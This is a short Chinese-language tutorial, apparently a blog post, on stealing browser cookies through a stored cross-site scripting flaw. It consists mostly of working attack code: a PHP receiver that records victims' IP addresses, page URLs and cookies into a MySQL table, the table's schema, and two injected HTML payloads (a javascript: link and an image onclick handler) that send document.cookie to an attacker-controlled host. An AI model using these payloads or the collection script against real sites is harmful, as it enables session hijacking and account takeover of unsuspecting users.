xss获取cookie
·
主要是借助存储型xss漏洞,来进行攻击的,毕竟其它两个方式说实话比较难触发
获取cookie的接受函数
<?
$ip=$_SERVER['REMOTE_ADDR']; 从头部获取
$url=$_GET['url']; 获取url
$cookie=$_GET['cookie']; 获取cookie
$conn=new mysqli('127.0.0.1','root','123456','blog',3306); 连接mysql
$conn->set_charset("utf8mb4");
$sql="insert into blog.cookie(ip,url,cookie) values('$ip','$url','$cookie');";
$conn->query($sql); 执行语句
?>
写在自己的机器上,后面直接访问它mysql新建表
create table cookie(
id int(10) primary key auto_increment, #主键,自增长
ip varchar(50),
url varchar(255),
cookie varchar(255),
time timestamp NULL default CURRENT_TIMESTAMP #自动获取时间
)character set=utf8mb4;
准备xss注入语句
PHP后台需要将 + 号处理为:%2B,将 & 处理为 %26
href连接准备的语句,img给事先准备图片
<a href=\'javascript:location.href="http://192.168.18.141/sefa15/xss/getcookie.php?url="%2Blocation.href%2B"%26cookie="%2Bdocument.cookie\'><img src="http://192.168.18.141/sefa15/tupian/注册页面.jpg" width="30%"/></a>另一种,img直接设置
<img src="http://192.168.18.141/sefa15/tupian/注册页面.jpg" width="30%" onclick=\'location.href="http://192.168.18.141/sefa15/xss/getcookie.php?url="%2Blocation.href%2B"%26cookie="%2Bdocument.cookie\'>更多推荐
所有评论(0)